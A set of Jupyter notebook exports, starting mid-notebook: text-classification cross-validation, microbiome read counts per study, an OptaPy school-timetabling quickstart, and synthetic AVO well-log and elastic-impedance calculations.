cv = StratifiedKFold(train_labels_binary, n_folds=3)
train_labels_binary = le.transform(train_labels)
for i, (train,test) in enumerate(cv):
cv_train = train_corpus[train]
cv_test = train_corpus[test]
bag_of_words_train, bag_of_words_test, feature_names = create_test_train_bag_of_words(cv_train,
cv_test)
probas_ = clf.fit(bag_of_words_train,
train_labels_binary[train]).predict_proba(bag_of_words_test)
cv_test_labels = train_labels_binary[test]
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(cv_test_labels,
probas_[:,1])
auc_val = auc(recall_curve,precision_curve)
plt.plot(recall_curve, precision_curve, label='AUC-PR {0} {1:.2f}'.format(i,auc_val))
plt.ylim(0,1.05)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.legend(loc="lower left", fontsize='x-small')
###Output
_____no_output_____
###Markdown
In this case we did 5-fold cross-validation and plotted precision-recall curves for each iteration. You can see that there is a marked difference between the iterations. We can then average the AUC-PR of each iteration to estimate the performance of our method. --- Exercise 7 Try 5-fold cross-validation.
###Code
from sklearn.cross_validation import StratifiedKFold
cv = StratifiedKFold(train_labels_binary, n_folds=5)
train_labels_binary = le.transform(train_labels)
for i, (train,test) in enumerate(cv):
cv_train = train_corpus[train]
cv_test = train_corpus[test]
bag_of_words_train, bag_of_words_test, feature_names = create_test_train_bag_of_words(cv_train,
cv_test)
probas_ = clf.fit(bag_of_words_train,
train_labels_binary[train]).predict_proba(bag_of_words_test)
cv_test_labels = train_labels_binary[test]
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(cv_test_labels,
probas_[:,1])
auc_val = auc(recall_curve,precision_curve)
plt.plot(recall_curve, precision_curve, label='AUC-PR {0} {1:.2f}'.format(i,auc_val))
plt.ylim(0,1.05)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.legend(loc="lower left", fontsize='x-small')
###Output
_____no_output_____
###Markdown
--- Examples of Tagging
###Code
df_test
num_comments = 2
label0_comment_idx = y_score[:,1].argsort()[:num_comments]
label1_comment_idx = y_score[:,1].argsort()[-num_comments:]
test_set_labels = labels[test_set_idx]
#convert back to the indices of the original dataset
top_comments_testing_set_idx = np.concatenate([label0_comment_idx,
label1_comment_idx])
#these are the 5 comments the model is most sure of
for i in top_comments_testing_set_idx:
print(
u"""{}:{}\n---\n{}\n===""".format(test_set_labels[i],
y_score[i,1],
test_corpus[i]))
###Output
_____no_output_____ |
scripts/count_reads.ipynb | ###Markdown
Create a table with mean, std and median of number of reads per sample for each study
###Code
def count_reads(out_file,rarefaction_depths):
'''Count the reads for each sample in each cohort and save the mean, median and std
Parameters
----------
out_file:str
name of the output tsv file
rarefaction_depths: list of int
the rarefactions to test
'''
cols = ['cohort','mean','median','std','num_samples','num_HC','num_disease']
for crare in rarefaction_depths:
cols.append('num_rare_%d' % crare)
df=pd.DataFrame(columns=cols)
out_file = join(save_dir,out_file)
num_processed = 0
for cname in glob.glob('../studies/*'):
if os.path.isdir(cname):
print('**********')
print(cname)
tables = glob.glob(os.path.join(cname,'all.*biom'))
print(tables)
if len(tables)==0:
print('dir %s does not contain a biom table' % cname)
continue
bt=tables[0]
data=ca.read_amplicon(os.path.join(bt),os.path.join(cname,'up.map.csv'),normalize=10000,min_reads=1000)
data=data.filter_samples('type',['HC','disease'])
print('-------------')
print(data)
cline={}
cline['cohort']=cname
cline['mean']=np.mean(data.sample_metadata._calour_original_abundance)
cline['median']=np.median(data.sample_metadata._calour_original_abundance)
cline['std']=np.std(data.sample_metadata._calour_original_abundance)
cline['num_samples'] = len(data.sample_metadata)
cline['num_HC'] = np.sum(data.sample_metadata['type']=='HC')
cline['num_disease'] = np.sum(data.sample_metadata['type']=='disease')
for crare in rarefaction_depths:
cline['num_rare_%d' % crare] = np.sum(data.sample_metadata._calour_original_abundance >= crare)
df = df.append(cline,ignore_index=True)
num_processed += 1
print('processed %d studies' % num_processed)
df.to_csv(out_file,sep='\t')
ca.set_log_level('ERROR')
count_reads(out_file='summary.txt', rarefaction_depths=[1000, 4000, 7500, 10000])
###Output
**********
../studies/61
['../studies/61/all.biom']
-------------
AmpliconExperiment with 41 samples, 2715 features
**********
../studies/59
['../studies/59/all.biom']
-------------
AmpliconExperiment with 33 samples, 2637 features
**********
../studies/50
['../studies/50/all.biom']
-------------
AmpliconExperiment with 58 samples, 959 features
**********
../studies/57
['../studies/57/all.biom']
-------------
AmpliconExperiment with 85 samples, 4058 features
**********
../studies/32
['../studies/32/all.biom']
-------------
AmpliconExperiment with 43 samples, 1748 features
**********
../studies/56
['../studies/56/all.biom']
-------------
AmpliconExperiment with 43 samples, 3045 features
**********
../studies/51
['../studies/51/all.biom']
-------------
AmpliconExperiment with 164 samples, 3240 features
**********
../studies/58
['../studies/58/all.biom']
-------------
AmpliconExperiment with 45 samples, 3005 features
**********
../studies/60
['../studies/60/all.biom']
-------------
AmpliconExperiment with 73 samples, 3771 features
**********
../studies/34
['../studies/34/all.biom']
-------------
AmpliconExperiment with 32 samples, 1234 features
**********
../studies/33
['../studies/33/all.biom']
-------------
AmpliconExperiment with 58 samples, 1250 features
**********
../studies/20
['../studies/20/all.biom']
-------------
AmpliconExperiment with 151 samples, 1622 features
**********
../studies/18
['../studies/18/all.biom']
-------------
AmpliconExperiment with 84 samples, 1183 features
**********
../studies/27
['../studies/27/all.biom']
-------------
AmpliconExperiment with 233 samples, 1403 features
**********
../studies/9
['../studies/9/all.biom']
-------------
AmpliconExperiment with 451 samples, 3722 features
**********
../studies/11
['../studies/11/all.biom']
-------------
AmpliconExperiment with 109 samples, 2312 features
**********
../studies/7
['../studies/7/all.biom']
-------------
AmpliconExperiment with 441 samples, 4403 features
**********
../studies/29
['../studies/29/all.biom']
-------------
AmpliconExperiment with 594 samples, 3470 features
**********
../studies/16
['../studies/16/all.biom']
-------------
AmpliconExperiment with 119 samples, 2116 features
**********
../studies/42
['../studies/42/all.biom']
-------------
AmpliconExperiment with 96 samples, 3829 features
**********
../studies/45
['../studies/45/all.biom']
-------------
AmpliconExperiment with 1043 samples, 14981 features
**********
../studies/6
['../studies/6/all.biom']
-------------
AmpliconExperiment with 612 samples, 4175 features
**********
../studies/28
['../studies/28/all.biom']
-------------
AmpliconExperiment with 135 samples, 1306 features
**********
../studies/17
['../studies/17/all.biom']
-------------
AmpliconExperiment with 50 samples, 2307 features
**********
../studies/1
['../studies/1/all.biom']
-------------
AmpliconExperiment with 38 samples, 1082 features
**********
../studies/10
['../studies/10/all.biom']
-------------
AmpliconExperiment with 174 samples, 3295 features
**********
../studies/19
['../studies/19/all.biom']
-------------
AmpliconExperiment with 68 samples, 1401 features
**********
../studies/26
['../studies/26/all.biom']
-------------
AmpliconExperiment with 25 samples, 11834 features
**********
../studies/8
['../studies/8/all.biom']
-------------
AmpliconExperiment with 33 samples, 780 features
**********
../studies/21
['../studies/21/all.biom']
-------------
AmpliconExperiment with 178 samples, 2597 features
**********
../studies/44
['../studies/44/all.biom']
-------------
AmpliconExperiment with 835 samples, 11915 features
**********
../studies/43
['../studies/43/all.biom']
-------------
AmpliconExperiment with 89 samples, 3426 features
**********
../studies/36
['../studies/36/all.biom']
-------------
AmpliconExperiment with 15 samples, 1191 features
**********
../studies/31
['../studies/31/all.biom']
-------------
AmpliconExperiment with 70 samples, 1929 features
**********
../studies/62
['../studies/62/all.biom']
-------------
AmpliconExperiment with 196 samples, 5813 features
**********
../studies/54
['../studies/54/all.biom']
-------------
AmpliconExperiment with 63 samples, 3657 features
**********
../studies/53
['../studies/53/all.biom']
-------------
AmpliconExperiment with 115 samples, 4878 features
**********
../studies/37
['../studies/37/all.biom']
-------------
AmpliconExperiment with 727 samples, 12055 features
**********
../studies/39
['../studies/39/all.biom']
-------------
AmpliconExperiment with 587 samples, 10422 features
**********
../studies/52
['../studies/52/all.biom']
-------------
AmpliconExperiment with 30 samples, 2580 features
**********
../studies/55
['../studies/55/all.biom']
-------------
AmpliconExperiment with 74 samples, 3939 features
**********
../studies/46
['../studies/46/all.biom']
-------------
AmpliconExperiment with 554 samples, 10980 features
**********
../studies/41
['../studies/41/all.biom']
-------------
AmpliconExperiment with 80 samples, 3557 features
**********
../studies/48
['../studies/48/all.biom']
-------------
AmpliconExperiment with 280 samples, 6184 features
**********
../studies/24
['../studies/24/all.biom']
-------------
AmpliconExperiment with 25 samples, 999 features
**********
../studies/23
['../studies/23/all.biom']
-------------
AmpliconExperiment with 114 samples, 1867 features
**********
../studies/4
['../studies/4/all.biom']
-------------
AmpliconExperiment with 82 samples, 1652 features
**********
../studies/15
['../studies/15/all.biom']
-------------
AmpliconExperiment with 162 samples, 2103 features
**********
../studies/3
['../studies/3/all.biom']
-------------
AmpliconExperiment with 334 samples, 3021 features
**********
../studies/12
['../studies/12/all.biom']
-------------
AmpliconExperiment with 224 samples, 13732 features
**********
../studies/49
['../studies/49/all.biom']
-------------
AmpliconExperiment with 263 samples, 8112 features
**********
../studies/40
['../studies/40/all.biom']
-------------
AmpliconExperiment with 85 samples, 3917 features
**********
../studies/47
['../studies/47/all.biom']
-------------
AmpliconExperiment with 247 samples, 7437 features
**********
../studies/2
['../studies/2/all.biom']
-------------
AmpliconExperiment with 179 samples, 2528 features
**********
../studies/13
['../studies/13/all.biom']
-------------
AmpliconExperiment with 31 samples, 925 features
**********
../studies/5
['../studies/5/all.biom']
-------------
AmpliconExperiment with 333 samples, 4664 features
**********
../studies/14
['../studies/14/all.biom']
-------------
AmpliconExperiment with 123 samples, 1271 features
**********
../studies/22
['../studies/22/all.biom']
-------------
AmpliconExperiment with 144 samples, 2687 features
**********
../studies/25
['../studies/25/all.biom']
-------------
AmpliconExperiment with 89 samples, 1781 features
processed 59 studies
###Markdown
Plot the summary stats
###Code
df=pd.read_csv(join(save_dir,'summary.txt'), sep='\t')
df=df.sort_values('median')
f=plt.figure()
plt.bar(np.arange(len(df)),df['median'])
plt.yscale('log')
plt.ylabel('median reads/study')
plt.xlabel('study')
pass
df=df.sort_values('mean')
f=plt.figure()
plt.bar(np.arange(len(df)),df['mean'])
plt.yscale('log')
plt.ylabel('mean reads/study')
plt.xlabel('study')
pass
plt.figure()
plt.hist(df['median'],60)
plt.xlabel('median reads/study')
plt.ylabel('number of studies')
pass
df=df.sort_values('median')
df
###Output
_____no_output_____
###Markdown
Choose the rarefaction depth to work with
###Code
df=df.sort_values('num_rare_4000')
df
###Output
_____no_output_____ |
school-timetabling/school-timetabling-quickstart.ipynb | ###Markdown
OptaPy - OptaPlanner in PythonOptaPy is an **AI constraint solver for Python** to optimize the Vehicle Routing Problem, Employee Rostering, Maintenance Scheduling, Task Assignment, School Timetabling, Cloud Optimization, Conference Scheduling, Job Shop Scheduling, Bin Packing and many more planning problems.OptaPy wraps the [OptaPlanner](https://www.optaplanner.org/) engine internally, but using OptaPy in Python is significantly slower than using OptaPlanner in Java or Kotlin.WARNING: OptaPy is an experimental technology. It is at least 20 times slower than using OptaPlanner in Java or Kotlin. What is OptaPlanner?OptaPlanner is an AI constraint solver. It optimizes planning and scheduling problems, such as the Vehicle Routing Problem, Employee Rostering, Maintenance Scheduling, Task Assignment, School Timetabling, Cloud Optimization, Conference Scheduling, Job Shop Scheduling, Bin Packing and many more. Every organization faces such challenges: assign a limited set of constrained resources (employees, assets, time and/or money) to provide products or services. OptaPlanner delivers more efficient plans, which reduce costs and improve service quality.Constraints apply on plain domain objects and can call existing code. There’s no need to input constraints as mathematical equations. Under the hood, OptaPlanner combines sophisticated Artificial Intelligence optimization algorithms (such as Tabu Search, Simulated Annealing, Late Acceptance and other metaheuristics) with very efficient score calculation and other state-of-the-art constraint solving techniques. An Example: School Timetabling Model the domain objects and constraintsThe goal is to assign each lesson to a time slot and a room. The model is divided into four kind of objects Problem FactsProblem facts are facts about the problem. As such, they do not change during solving (and thus cannot have any planning variables). An example problem fact is shown below:
###Code
from optapy import problem_fact, planning_id
@problem_fact
class Room:
def __init__(self, id, name):
self.id = id
self.name = name
@planning_id
def get_id(self):
return self.id
def __str__(self):
return f"Room(id={self.id}, name={self.name})"
###Output
_____no_output_____
###Markdown
The `@problem_fact` decorator creates a Java class for Room, which allows it to be used in constraints. The `@planning_id` decorator tells OptaPlanner that it can use that method for identifying identifical pairs. It is only required if you use `fromUniquePair` on the class in a constraint.The code for the Timeslot probelm fact is shown below:
###Code
@problem_fact
class Timeslot:
def __init__(self, id, day_of_week, start_time, end_time):
self.id = id
self.day_of_week = day_of_week
self.start_time = start_time
self.end_time = end_time
@planning_id
def get_id(self):
return self.id
def __str__(self):
return (
f"Timeslot("
f"id={self.id}, "
f"day_of_week={self.day_of_week}, "
f"start_time={self.start_time}, "
f"end_time={self.end_time})"
)
###Output
_____no_output_____
###Markdown
Planning EntitiesDuring a lesson, represented by the Lesson class, a teacher teaches a subject to a group of students, for example, Math by A.Turing for 9th grade or Chemistry by M.Curie for 10th grade. If a subject is taught multiple times per week by the same teacher to the same student group, there are multiple Lesson instances that are only distinguishable by id. For example, the 9th grade has six math lessons a week.During solving, OptaPlanner changes the timeslot and room fields of the Lesson class, to assign each lesson to a time slot and a room. Because OptaPlanner changes these fields, Lesson is a planning entity. Here is how we would write it in Python:
###Code
from optapy import planning_entity, planning_variable
@planning_entity
class Lesson:
def __init__(self, id, subject, teacher, student_group, timeslot=None, room=None):
self.id = id
self.subject = subject
self.teacher = teacher
self.student_group = student_group
self.timeslot = timeslot
self.room = room
@planning_id
def get_id(self):
return self.id
@planning_variable(Timeslot, ["timeslotRange"])
def get_timeslot(self):
return self.timeslot
def set_timeslot(self, new_timeslot):
self.timeslot = new_timeslot
@planning_variable(Room, ["roomRange"])
def get_room(self):
return self.room
def set_room(self, new_room):
self.room = new_room
def __str__(self):
return (
f"Lesson("
f"id={self.id}, "
f"timeslot={self.timeslot}, "
f"room={self.room}, "
f"teacher={self.teacher}, "
f"subject={self.subject}, "
f"student_group={self.student_group}"
f")"
)
###Output
_____no_output_____
###Markdown
The `@planning_entity` decorator creates a Java class for Lesson, which allows it to be used in constraints.The `@planning_variable` specify that a method returns a planning variable. As such, OptaPlanner will call the corresponding setter to change the value of the variable during solving. It must be named `get%Variable()` and has a corresponding setter `set%Variable` (where `%Variable` is the name of the variable). It takes two parameters:- The first parameter is the type this planning variable takes.- The second parameter, `value_range_provider_refs`, describes where it gets its values from. It a list of the id of its value range providers The ConstraintsThe constraints tell OptaPlanner how good a solution is. Here how we create the constraints in Python:
###Code
from optapy import constraint_provider, get_class
from optapy.types import Joiners, HardSoftScore
from datetime import datetime, date, timedelta
LessonClass = get_class(Lesson)
RoomClass = get_class(Room)
# Trick since timedelta only works with datetime instances
today = date.today()
def within_30_minutes(lesson1, lesson2):
between = datetime.combine(today, lesson1.timeslot.end_time) - datetime.combine(today, lesson2.timeslot.start_time)
return timedelta(minutes=0) <= between <= timedelta(minutes=30)
@constraint_provider
def define_constraints(constraint_factory):
return [
# Hard constraints
room_conflict(constraint_factory),
teacher_conflict(constraint_factory),
student_group_conflict(constraint_factory),
# Soft constraints
teacher_room_stability(constraint_factory),
teacher_time_efficiency(constraint_factory),
student_group_subject_variety(constraint_factory)
]
def room_conflict(constraint_factory):
# A room can accommodate at most one lesson at the same time.
return constraint_factory \
.forEach(LessonClass) \
.join(LessonClass,
[
# ... in the same timeslot ...
Joiners.equal(lambda lesson: lesson.timeslot),
# ... in the same room ...
Joiners.equal(lambda lesson: lesson.room),
# form unique pairs
Joiners.lessThan(lambda lesson: lesson.id)
]) \
.penalize("Room conflict", HardSoftScore.ONE_HARD)
def teacher_conflict(constraint_factory):
# A teacher can teach at most one lesson at the same time.
return constraint_factory \
.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.timeslot),
Joiners.equal(lambda lesson: lesson.teacher),
Joiners.lessThan(lambda lesson: lesson.id)
]) \
.penalize("Teacher conflict", HardSoftScore.ONE_HARD)
def student_group_conflict(constraint_factory):
# A student can attend at most one lesson at the same time.
return constraint_factory \
.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.timeslot),
Joiners.equal(lambda lesson: lesson.student_group),
Joiners.lessThan(lambda lesson: lesson.id)
]) \
.penalize("Student group conflict", HardSoftScore.ONE_HARD)
def teacher_room_stability(constraint_factory):
# A teacher prefers to teach in a single room.
return constraint_factory \
.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.teacher),
Joiners.lessThan(lambda lesson: lesson.id)
]) \
.filter(lambda lesson1, lesson2: lesson1.room != lesson2.room) \
.penalize("Teacher room stability", HardSoftScore.ONE_SOFT)
def teacher_time_efficiency(constraint_factory):
# A teacher prefers to teach sequential lessons and dislikes gaps between lessons.
return constraint_factory.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.teacher),
Joiners.equal(lambda lesson: lesson.timeslot.day_of_week)
]) \
.filter(within_30_minutes) \
.reward("Teacher time efficiency", HardSoftScore.ONE_SOFT)
def student_group_subject_variety(constraint_factory):
# A student group dislikes sequential lessons on the same subject.
return constraint_factory.forEach(LessonClass) \
.join(LessonClass,
[
Joiners.equal(lambda lesson: lesson.subject),
Joiners.equal(lambda lesson: lesson.student_group),
Joiners.equal(lambda lesson: lesson.timeslot.day_of_week)
]) \
.filter(within_30_minutes) \
.penalize("Student group subject variety", HardSoftScore.ONE_SOFT)
###Output
_____no_output_____
###Markdown
The `@constraint_provider` decorator creates a Java `ConstraintProvider` class, allowing OptaPlanner to use it. You can call any python method when evaluating your constraints. Planning SolutionFinally, there is the planning solution. The planning solution stores references to all the problem facts and planning entities that define the problem. Additionally, it also contain the score of the solution. The planning solution class represent both the problem and the solution; as such, a problem can be viewed as an unintialized planning solution. Here how we define it in Python:
###Code
from optapy import planning_solution, planning_entity_collection_property, \
problem_fact_collection_property, \
value_range_provider, planning_score
def format_list(a_list):
return ',\n'.join(map(str, a_list))
@planning_solution
class TimeTable:
def __init__(self, timeslot_list, room_list, lesson_list, score=None):
self.timeslot_list = timeslot_list
self.room_list = room_list
self.lesson_list = lesson_list
self.score = score
def set_student_group_and_teacher_list(self):
self.student_group_list = []
self.teacher_list = []
for lesson in self.lesson_list:
if lesson.teacher not in self.teacher_list:
self.teacher_list.append(lesson.teacher)
if lesson.student_group not in self.student_group_list:
self.student_group_list.append(lesson.student_group)
@problem_fact_collection_property(Timeslot)
@value_range_provider("timeslotRange")
def get_timeslot_list(self):
return self.timeslot_list
@problem_fact_collection_property(Room)
@value_range_provider("roomRange")
def get_room_list(self):
return self.room_list
@planning_entity_collection_property(Lesson)
def get_lesson_list(self):
return self.lesson_list
@planning_score(HardSoftScore)
def get_score(self):
return self.score
def set_score(self, score):
self.score = score
def __str__(self):
return (
f"TimeTable("
f"timeslot_list={format_list(self.timeslot_list)},\n"
f"room_list={format_list(self.room_list)},\n"
f"lesson_list={format_list(self.lesson_list)},\n"
f"score={str(self.score.toString()) if self.score is not None else 'None'}"
f")"
)
###Output
_____no_output_____
###Markdown
The `@planning_solution` decorator creates a Java class for TimeTable, allowing it to be passed to OptaPlanner.The `@problem_fact_collection_property` decorator tells OptaPlanner that method returns problem facts (it takes in one required argument: the Python class of the problem fact). Similarly, the `@planning_entity_collection_property` decorator tells OptaPlanner that method returns planning entities (it takes in one required argument: the Python class of the planning entity). The `@value_range_provider` decorator tells OptaPlanner the method provide values for variables. It `range_id` parameter is used determine what planning variable(s) accept values from it. For example, `timeslot` take values from the `timeslotRange`, so it accept values from `getTimeslotList`. Finally, the `@planning_score` decorator tells OptaPlanner the method returns the planning score (how good the solution is). Like with `@planning_variable`, It must be named `get%Score()` and has a corresponding setter `set%Score` (where `%Score` is the name of the score). Its parameter tells OptaPlanner what kind of score it takes. SolvingNow that we defined our model and constraints, let create an instance of the problem:
###Code
from datetime import time
def generate_problem():
timeslot_list = [
Timeslot(1, "MONDAY", time(hour=8, minute=30), time(hour=9, minute=30)),
Timeslot(2, "MONDAY", time(hour=9, minute=30), time(hour=10, minute=30)),
Timeslot(3, "MONDAY", time(hour=10, minute=30), time(hour=11, minute=30)),
Timeslot(4, "MONDAY", time(hour=13, minute=30), time(hour=14, minute=30)),
Timeslot(5, "MONDAY", time(hour=14, minute=30), time(hour=15, minute=30)),
Timeslot(6, "TUESDAY", time(hour=8, minute=30), time(hour=9, minute=30)),
Timeslot(7, "TUESDAY", time(hour=9, minute=30), time(hour=10, minute=30)),
Timeslot(8, "TUESDAY", time(hour=10, minute=30), time(hour=11, minute=30)),
Timeslot(9, "TUESDAY", time(hour=13, minute=30), time(hour=14, minute=30)),
Timeslot(10, "TUESDAY", time(hour=14, minute=30), time(hour=15, minute=30)),
]
room_list = [
Room(1, "Room A"),
Room(2, "Room B"),
Room(3, "Room C")
]
lesson_list = [
Lesson(1, "Math", "A. Turing", "9th grade"),
Lesson(2, "Math", "A. Turing", "9th grade"),
Lesson(3, "Physics", "M. Curie", "9th grade"),
Lesson(4, "Chemistry", "M. Curie", "9th grade"),
Lesson(5, "Biology", "C. Darwin", "9th grade"),
Lesson(6, "History", "I. Jones", "9th grade"),
Lesson(7, "English", "I. Jones", "9th grade"),
Lesson(8, "English", "I. Jones", "9th grade"),
Lesson(9, "Spanish", "P. Cruz", "9th grade"),
Lesson(10, "Spanish", "P. Cruz", "9th grade"),
Lesson(11, "Math", "A. Turing", "10th grade"),
Lesson(12, "Math", "A. Turing", "10th grade"),
Lesson(13, "Math", "A. Turing", "10th grade"),
Lesson(14, "Physics", "M. Curie", "10th grade"),
Lesson(15, "Chemistry", "M. Curie", "10th grade"),
Lesson(16, "French", "M. Curie", "10th grade"),
Lesson(17, "Geography", "C. Darwin", "10th grade"),
Lesson(18, "History", "I. Jones", "10th grade"),
Lesson(19, "English", "P. Cruz", "10th grade"),
Lesson(20, "Spanish", "P. Cruz", "10th grade"),
]
lesson = lesson_list[0]
lesson.set_timeslot(timeslot_list[0])
lesson.set_room(room_list[0])
return TimeTable(timeslot_list, room_list, lesson_list)
###Output
_____no_output_____
###Markdown
and solve it:
###Code
from optapy import solver_manager_create
from optapy.types import SolverConfig, Duration
from tango import pick_color
from ipywidgets import Tab
from ipysheet import sheet, cell, row, column, cell_range
solver_config = SolverConfig().withEntityClasses(get_class(Lesson)) \
.withSolutionClass(get_class(TimeTable)) \
.withConstraintProviderClass(get_class(define_constraints)) \
.withTerminationSpentLimit(Duration.ofSeconds(30))
solution = generate_problem()
solution.set_student_group_and_teacher_list()
cell_map = dict()
def on_best_solution_changed(best_solution):
global timetable
global solution
global cell_map
solution = best_solution
unassigned_lessons = []
clear_cell_set = set()
for (table_name, table_map) in cell_map.items():
for (key, cell) in table_map.items():
clear_cell_set.add(cell)
for lesson in solution.lesson_list:
if lesson.timeslot is None or lesson.room is None:
unassigned_lessons.append(lesson, clear_cell_set)
else:
update_lesson_in_table(lesson, clear_cell_set)
for cell in clear_cell_set:
cell.value = ""
cell.style["backgroundColor"] = "white"
for (table_name, table_map) in cell_map.items():
for (key, cell) in table_map.items():
cell.send_state()
def update_lesson_in_table(lesson, clear_cell_set):
global cell_map
x = solution.timeslot_list.index(lesson.timeslot)
room_column = solution.room_list.index(lesson.room)
teacher_column = solution.teacher_list.index(lesson.teacher)
student_group_column = solution.student_group_list.index(lesson.student_group)
color = pick_color(lesson.subject)
room_cell = cell_map['room'][(x, room_column)]
teacher_cell = cell_map['teacher'][(x, teacher_column)]
student_group_cell = cell_map['student_group'][(x, student_group_column)]
clear_cell_set.discard(room_cell)
clear_cell_set.discard(teacher_cell)
clear_cell_set.discard(student_group_cell)
room_cell.value = f"{lesson.subject}\n{lesson.teacher}\n{lesson.student_group}"
room_cell.style["backgroundColor"] = color
room_cell.send_state()
teacher_cell.value = f"{lesson.room.name}\n{lesson.subject}\n{lesson.student_group}"
teacher_cell.style["backgroundColor"] = color
teacher_cell.send_state()
student_group_cell.value = f"{lesson.room.name}\n{lesson.subject}\n{lesson.teacher}"
student_group_cell.style["backgroundColor"] = color
student_group_cell.send_state()
def create_table(table_name, solution, columns, name_map):
global cell_map
out = sheet(rows=len(solution.timeslot_list) + 1, columns=len(columns) + 1)
header_color = "#22222222"
cell(0,0, read_only=True, background_color=header_color)
header_row = row(0, list(map(name_map, columns)), column_start=1, read_only=True,
background_color=header_color)
timeslot_column = column(0,
list(map(lambda timeslot: timeslot.day_of_week[0:3] + " " + str(timeslot.start_time)[0:10],
solution.timeslot_list)), row_start=1, read_only=True, background_color=header_color)
table_cells = dict()
cell_map[table_name] = table_cells
for x in range(len(solution.timeslot_list)):
for y in range(len(columns)):
table_cells[(x, y)] = cell(x + 1, y + 1, "", read_only=True)
return out
solver_manager = solver_manager_create(solver_config)
by_room_table = create_table('room', solution, solution.room_list, lambda room: room.name)
by_teacher_table = create_table('teacher', solution, solution.teacher_list, lambda teacher: teacher)
by_student_group_table = create_table('student_group', solution, solution.student_group_list,
lambda student_group: student_group)
solver_manager.solveAndListen(0, lambda the_id: solution, on_best_solution_changed)
tab = Tab()
tab.children = [by_room_table, by_teacher_table, by_student_group_table]
tab.set_title(0, 'By Room')
tab.set_title(1, 'By Teacher')
tab.set_title(2, 'By Student Group')
tab
###Output
_____no_output_____ |
1_synthetic/4_avo_synthetic.ipynb | ###Markdown
Compute the elastic impedance, the normalized elastic impedance and the lrm
###Code
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import impedance as ip
%matplotlib inline
###Output
_____no_output_____
###Markdown
Elastic properties for AVO classesThe cell below defines the elastic properties for AVO classes compiled by [Alessandro del Monte](http://nbviewer.ipython.org/github/aadm/geophysical_notes/blob/master/avo_explorer_v2_mono.ipynb). Originally, Class IV is from Castagna & Swan (1997) "Principles of AVO crossplotting" (1997) and the others from Hilterman (2001) "Seismic Amplitude Interpretation".
###Code
shale = np.array([[3094,1515,2.40], [2643,1167,2.29], [2192,818,2.16], [3240,1620,2.34]])
sandgas = np.array([[4050,2526,2.21], [2781,1665,2.08], [1542,901,1.88], [1650,1090,2.07]])
sandbrine = np.array([[4115,2453,2.32], [3048,1595,2.23], [2134,860,2.11], [2590,1060,2.21]])
avocl=['Class I','Class II','Class III','Class IV']
angle = 30
###Output
_____no_output_____
###Markdown
The properties will generate the logs
###Code
faceis_vet = np.zeros(5)
vp=np.zeros(5) + shale[0,0]
vs = np.zeros(5) + shale[0,1]
rho = np.zeros(5) + shale[0,2]
for i in range (len(avocl)):
vp1 = np.zeros(100) + shale[i,0] #m/s
vs1 = np.zeros(100) + shale[i,1]
rho1 = np.zeros(100) + shale[i,2] #g/cc
faceis_vet1 = np.zeros(100)
vp2 = np.zeros(100) + sandgas[i,0]
vs2 = np.zeros(100) + sandgas[i,1] #m/s
rho2 = np.zeros(100) + sandgas[i,2] #g/cc
faceis_vet2 = np.zeros(100) + 1
vp3 = np.zeros(100) + sandbrine[i,0]
vs3 = np.zeros(100) + sandbrine[i,1] #m/s
rho3 = np.zeros(100) + sandbrine[i,2] #g/cc
faceis_vet3 = np.zeros(100) + 2
vp=np.concatenate((vp,vp1,vp2,vp1,vp3))
vs=np.concatenate((vs,vs1,vs2,vs1,vs3))
rho=np.concatenate((rho,rho1,rho2,rho1,rho3))
faceis_vet=np.concatenate((faceis_vet,faceis_vet1,faceis_vet2,faceis_vet1,faceis_vet3))
vp += np.random.normal(0, np.max(np.abs(vp))*0.005, len(vp))
vs += np.random.normal(0, np.max(np.abs(vs))*0.005, len(vs))
rho += np.random.normal(0, np.max(np.abs(rho))*0.1, len(rho.shape))
vpvs=vp/vs
#poisson ratio
pr=0.5*((vpvs**2-2)/(vpvs**2-1))
ai=ip.ai(vp,rho) # acoustic impedance
ei=ip.ei(vp,vs,rho,angle) # elastic impedance
nei=ip.nei(vp,vs,rho,shale[2,0],shale[2,1],shale[2,2],angle) # normalized elastic impedance
lambda_rho,mu_rho=ip.lrm(vp,vs,rho) # lambda rho and mu rho
###Output
_____no_output_____
###Markdown
Plot the logs - the tops of the gas sands are in red
###Code
fig=plt.figure(figsize=(12,15))
ax=plt.subplot(2,5,1)
plt.title('vp',fontsize=13)
plt.plot(vp,np.arange(vp.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(vp),np.max(vp),colors='r',alpha=0.6)
plt.hlines(505,np.min(vp),np.max(vp),colors='r',alpha=0.6)
plt.hlines(905,np.min(vp),np.max(vp),colors='r',alpha=0.6)
plt.hlines(1305,np.min(vp),np.max(vp),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,2)
plt.title('vs',fontsize=13)
plt.plot(vs,np.arange(vs.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(vs),np.max(vs),colors='r',alpha=0.6)
plt.hlines(505,np.min(vs),np.max(vs),colors='r',alpha=0.6)
plt.hlines(905,np.min(vs),np.max(vs),colors='r',alpha=0.6)
plt.hlines(1305,np.min(vs),np.max(vs),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,3)
plt.title('rho',fontsize=13)
plt.plot(rho,np.arange(rho.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(rho),np.max(rho),colors='r',alpha=0.6)
plt.hlines(505,np.min(rho),np.max(rho),colors='r',alpha=0.6)
plt.hlines(905,np.min(rho),np.max(rho),colors='r',alpha=0.6)
plt.hlines(1305,np.min(rho),np.max(rho),colors='r',alpha=0.6)
plt.grid(True)
ax=plt.subplot(2,5,4)
plt.title('vp/vs',fontsize=13)
plt.plot(vpvs,np.arange(vpvs.shape[0]))
ax.invert_yaxis()
plt.hlines(105,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6)
plt.hlines(505,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6)
plt.hlines(905,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6)
plt.hlines(1305,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6)
